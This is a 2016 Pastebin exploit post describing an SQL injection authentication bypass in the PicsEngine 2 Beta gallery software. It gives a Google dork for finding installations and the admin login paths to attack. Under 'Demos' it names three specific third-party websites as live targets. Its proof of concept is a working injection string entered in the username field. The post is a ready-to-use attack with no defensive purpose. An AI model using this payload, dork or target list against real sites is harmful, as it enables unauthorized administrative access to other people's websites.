Advertisement
Blast3r_ma

PicsEngine 2 Beta - SQL Injection Authentication Bypass Vuln

Jan 28th, 2016
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.03 KB | None | 0 0
  1. ################################################
  2. # Exploit Title: PicsEngine 2 Beta - SQL Injection Authentication Bypass Vulnerability
  3. # Google Dork: intitle:"Powered By PicsEngine 2 Beta"
  4. # Date: 28-1-2016
  5. # Twitter :D : https://twitter.com/Blast3r_ma
  6. # Exploit Author: Blast3r_ma
  7. # Software Link: http://www.commentcamarche.net/download/telecharger-34086165-picsengine
  8. # Software Link: http://telecharger.logiciel.net/picsengine/
  9. # Tested on:  Windows , Linux
  10. # Version: 2 Beta
  11. ################################################
  12.  
  13. =========Demos:=================
  14. http://www.ethnomusika.org/public/gallery/admin/signin.php?ref=/public/gallery/admin/
  15. http://www.sylval.com/galerie/admin/signin.php?ref=/galerie/admin/
  16. http://chomette-architectes.com/galerie/admin/signin.php?ref=/galerie/admin/
  17. .......
  18. ====================================
  19.  
  20. Path:
  21. ==================
  22. http://<target>/gallery/admin
  23. or
  24. http://<target>/admin
  25. ==============
  26.  
  27. POC-Exploit:
  28. ============
  29. *Username: ADmin' OR 1=1 -- -
  30. *Password: lksjfksjflsdkfj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement